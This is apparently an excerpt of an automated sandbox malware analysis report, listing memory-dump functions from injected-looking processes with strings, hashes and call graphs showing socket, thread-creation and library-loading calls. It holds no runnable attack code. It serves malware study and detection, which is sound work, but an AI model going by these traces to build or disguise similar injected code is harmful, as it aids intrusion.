                                • Execute=1, xrefs: 033E4713
                                • ExecuteOptions, xrefs: 033E46A0
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033E4725
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033E4655
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                Strings
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033E02E7
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033E02BD
                                • RTL: Re-Waiting, xrefs: 033E031E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                Strings
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 033E7B7F
                                • RTL: Re-Waiting, xrefs: 033E7BAC
                                • RTL: Resource at %p, xrefs: 033E7B8E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                 • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                • Opcode ID: 6f8ac40972aed7d477bb6c7d2daaf07e159b4a17e26b3f197b01b7fbc2e9c460
                                • Instruction ID: 3db50fee364aad8da4b61d6ad46b8de93de517a14ae37ec23d8ed27453bc9639
                                • Opcode Fuzzy Hash: 6f8ac40972aed7d477bb6c7d2daaf07e159b4a17e26b3f197b01b7fbc2e9c460
                                • Instruction Fuzzy Hash: EA41C235701B029FC724DE29DC80B6AF7E9EF88710F180A1DF95A9B680DB71E8058B91
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033E728C
                                Strings
                                • RTL: Re-Waiting, xrefs: 033E72C1
                                • RTL: Resource at %p, xrefs: 033E72A3
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 033E7294
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                 • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: 6be9295b8a71b968d12105a73422b36355c65a45be662b19a7ae6d46ef621325
                                • Instruction ID: 218dda4f4b00e3b2279f298dde519e40bf334830a69394b2c7de294c6be0783a
                                • Opcode Fuzzy Hash: 6be9295b8a71b968d12105a73422b36355c65a45be662b19a7ae6d46ef621325
                                • Instruction Fuzzy Hash: 3441BC35B00716AFDB20DE29CCC1B6AB7A9FB84710F180619F955AB680DB21E8529BD1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                 • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction ID: 75b438c5b1ee9222df18ccde6ab3789f5cdb09a53bf1fefaa7931ce568391ac6
                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction Fuzzy Hash: AA919170E0021A9BDB24DE69CCC16FEB7B9EFC4760F18461AEA65EBAD0D73489418714
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                 • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: 44d09b095610eb82d4fad7dd503c92a8913ff74628fc6d5f269c2eef165ec373
                                • Instruction ID: f596c43ad8243bbc5e5dc3fbb9fd5b3fa24d1f3e5cfba37cb19555c7e3cf0632
                                • Opcode Fuzzy Hash: 44d09b095610eb82d4fad7dd503c92a8913ff74628fc6d5f269c2eef165ec373
                                • Instruction Fuzzy Hash: AC811976D01269DBDB31DF54CC84BEAB6B8AB08710F0445EAE919B7240E7749E85CFA0

                                Execution Graph

                                Execution Coverage:9.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:7
                                Total number of Limit Nodes:1
                                 execution_graph (rendered graph omitted; its nodes show the functions at 587ccc5 and 587caff each calling socket)

                                Callgraph

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 control_flow_graph (rendered graph omitted; the function starting at 587ccc5 calls socket at 587cd69-587cd76 and calls 587caff at 587ce02-587ce10)
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2676422121.0000000005860000.00000040.80000000.00040000.00000000.sdmp, Offset: 05860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_5860000_IGcdoWhymz.jbxd
                                Similarity
                                • API ID: socket
                                • String ID: x;U
                                • API String ID: 98920635-1443787485
                                • Opcode ID: 0308a91202fe700d913f425cd6691dd5b5970b4c492ce70bbac6cbf28f13cc5f
                                • Instruction ID: e2c644ce95c61727039931d31505e3686835cd472c7a7cce5908ec463daa5c27
                                • Opcode Fuzzy Hash: 0308a91202fe700d913f425cd6691dd5b5970b4c492ce70bbac6cbf28f13cc5f
                                • Instruction Fuzzy Hash: EAC1177290825D9FCB1ACF68D490AEDBFB2FF4A314B284199D855DB356D330AD42CB90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 control_flow_graph (rendered graph omitted; the function starting at 587caff contains a call to socket at 587cd69-587cd76 and a call to 587caff at 587ce02-587ce10)
                                Memory Dump Source
                                • Source File: 00000009.00000002.2676422121.0000000005860000.00000040.80000000.00040000.00000000.sdmp, Offset: 05860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_5860000_IGcdoWhymz.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b2798e269155d91610fc7f876ae07e90d17035f3c1c5ab930b5ad472df32187
                                • Instruction ID: 630ee5c9fd6db648b9385e8f26d172bced2cc22b9b43b4749655a1492353da54
                                • Opcode Fuzzy Hash: 4b2798e269155d91610fc7f876ae07e90d17035f3c1c5ab930b5ad472df32187
                                • Instruction Fuzzy Hash: 38B1157190815D9FCB06CF69D890AEDBFF2BF8A314F184199E851AB242C731AD42CB91

                                Execution Graph

                                Execution Coverage:2.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:21
                                Total number of Limit Nodes:2
                                 execution_graph (rendered graph omitted; its nodes show calls to LdrLoadDll at 21fb4d78b80, SleepEx at 21fb4d6f70b and CreateThread at 21fb4d6eb0a)

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15b08d44aa81dbeb14d6fdedd9722e35663d15487368850efe64efac8120c430
                                • Instruction ID: 1cf1ad619940b6f44e7b40522f93a3846fba1023882258717a69435a5241f2ef
                                • Opcode Fuzzy Hash: 15b08d44aa81dbeb14d6fdedd9722e35663d15487368850efe64efac8120c430
                                • Instruction Fuzzy Hash: F031253151C6448FFB84DF68D65A3E1B7D0FBAD318F08017DD45ACB286E73696428745

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: dc8142fd8931c1e7f142caca776afbb646ae2a63b35c8960207c056a4b6e3c9b
                                • Instruction ID: 4c8c3b785e53d81a720a00bd2204effc69a5057884904ac343d9046042d1d384
                                • Opcode Fuzzy Hash: dc8142fd8931c1e7f142caca776afbb646ae2a63b35c8960207c056a4b6e3c9b
                                • Instruction Fuzzy Hash: CB21627091CA144FEBD59F28CBA97E972D0EB7C708F44067DE46BC7186CB349B418642

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: 2f638fcf48c97c81224dc21a86f7322f2f3cc3dceeec21d1b4eb1a5441828f8a
                                • Instruction ID: 9ebe5aee5c93d5fec842d71855efd29685ec95b10d4e4078bc90ab36f0b07ebb
                                • Opcode Fuzzy Hash: 2f638fcf48c97c81224dc21a86f7322f2f3cc3dceeec21d1b4eb1a5441828f8a
                                • Instruction Fuzzy Hash: 2F01B53021CA084BEBA4E724CA9DBE773D4FBBC308F00053DA45FC2190EA35D7448A46

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 0000000B.00000002.2108611939.0000021FB4D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000021FB4D00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21fb4d00000_firefox.jbxd
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 815eb6b9f470969443edcc2936cc1cd3fe6d9fbd3004cdb6df24038f92ac96fe
                                • Instruction ID: 1b1516ddf3d62920958aaad0ab716806b53d4a5eb51771714f1bc2aa5bc09d3d
                                • Opcode Fuzzy Hash: 815eb6b9f470969443edcc2936cc1cd3fe6d9fbd3004cdb6df24038f92ac96fe
                                • Instruction Fuzzy Hash: 0711C0306186098BFB98EF68C66D7D6B3D0FBAC308F05027DD45ACB2C6DB7986458752